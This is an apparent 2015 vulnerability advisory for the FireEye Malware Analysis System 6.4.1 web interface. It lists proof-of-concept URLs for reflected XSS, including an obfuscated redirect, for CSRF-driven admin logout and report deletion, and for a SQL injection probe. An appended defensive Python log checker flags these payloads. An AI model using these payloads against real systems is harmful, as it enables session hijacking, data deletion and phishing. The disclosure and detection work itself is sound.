FireEye Malware Analysis System (MAS) 6.4.1 – multiple vulnerabilities

2015-04-23T00:00:00
ID MYHACK58:62201561569
Type myhack58
Reporter Anonymous
Modified 2015-04-23T00:00:00

Description

The web login section of the FireEye Malware Analysis System (MAS) contains multiple serious vulnerabilities.

[Multiple Vulnerabilities]

* 3 XSS (reflected)
* 1 CSRF
* 1 NoSQLi (JSON object)
* 1 PostgreSQL SQLi (Exploitable?)
* 1 File and Path Disclosure
* 1 Source code Info-leak

[*] XSS:

Cross-site 1

https://192.168.1.50/yara/show_ya_file?name=<body onload=alert('XSSED')%3E

PoC usage:

https://192.168.1.50/yara/show_ya_file?name=<body onload=document.location=(String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109))%3E

Or phishing:

https://192.168.1.50/yara/show_ya_file?name=<body onload=document.write(String.fromCharCode

Cross-site 2

https://192.168.1.50/network/network?new_domain=%3Cscript%3Ealert%28%27XSSED%27%29%3C%2Fscript%3E

Cross-site 3

https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E

[*] CSRF:

1. Administrator logout

https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location="https://192.168.1.50/login/logout?notice=Deconnection+kmkz+CSRF+PoC"</script%3E

2. Report deletion

https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location="https://192.168.1.50/report/delete_pdf/?id=Alert_Details_fireye-2F_20140502_120000.xml"</script%3E

[*] SQLi: PostgreSQL SQL injection

https://192.168.1.50/event_stream/send_pcap_file?ev_id=9999 OR SELECT 1,2 FROM events /**

Output:

Event ID '9999 OR SELECT 1,2 FROM events ' could not be retrieved. Couldn't find Event with id=9999 OR SELECT 1,2 FROM events
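An added example, not part of the original advisory: a log check that percent-decodes the query string of requests to the four endpoints listed above and flags parameter values that fall outside an allowlist. The allowlist patterns, the sample log lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoints and parameter names are the ones listed in the advisory; the
# allowlist pattern for each value is an assumption about legitimate input.
RULES = {
    "/yara/show_ya_file": ("name", re.compile(r"[A-Za-z0-9_.\-]{1,128}")),
    "/network/network": ("new_domain", re.compile(r"[A-Za-z0-9.\-]{1,253}")),
    "/manual/csc": ("mode", re.compile(r"[A-Za-z0-9_]{1,32}")),
    "/event_stream/send_pcap_file": ("ev_id", re.compile(r"[0-9]{1,18}")),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/\d\.\d"')

def check_line(log_line):
    """Return (path, param, decoded value) for a rule violation, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    path = url.path.rstrip("/")
    if path not in RULES:
        return None
    param, allowed = RULES[path]
    # parse_qsl percent-decodes, so encoded markup is compared in clear form.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key == param and not allowed.fullmatch(value):
            return (path, param, value)
    return None

def scan(lines):
    """Return every rule violation found in an iterable of log lines."""
    return [hit for hit in map(check_line, lines) if hit is not None]

# Constructed access-log lines (combined-log style), not captured traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Apr/2015:10:00:01 +0000] "GET /yara/show_ya_file?name=rules.yara HTTP/1.1" 200 512',
    '10.0.0.9 - - [23/Apr/2015:10:00:07 +0000] "GET /yara/show_ya_file?name=%3Cbody%20onload%3Dalert(1)%3E HTTP/1.1" 200 734',
    '10.0.0.9 - - [23/Apr/2015:10:00:09 +0000] "GET /network/network?new_domain=%3Cscript%3Ealert%28%27XSSED%27%29%3C%2Fscript%3E HTTP/1.1" 200 901',
    '10.0.0.5 - - [23/Apr/2015:10:00:12 +0000] "GET /network/network?new_domain=example.org HTTP/1.1" 200 640',
    '10.0.0.9 - - [23/Apr/2015:10:00:15 +0000] "GET /event_stream/send_pcap_file?ev_id=9999%20OR%20SELECT%201,2%20FROM%20events HTTP/1.1" 404 88',
    '10.0.0.5 - - [23/Apr/2015:10:00:20 +0000] "GET /event_stream/send_pcap_file?ev_id=42 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for path, param, value in scan(SAMPLE_LOG):
        print(f"ALERT {path} {param}={value!r}")
```

The same allowlist check, applied in the application before the value is echoed or used in a lookup, rejects these inputs at the source; the CSRF items additionally need state-changing actions moved off GET and protected by a per-session token.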
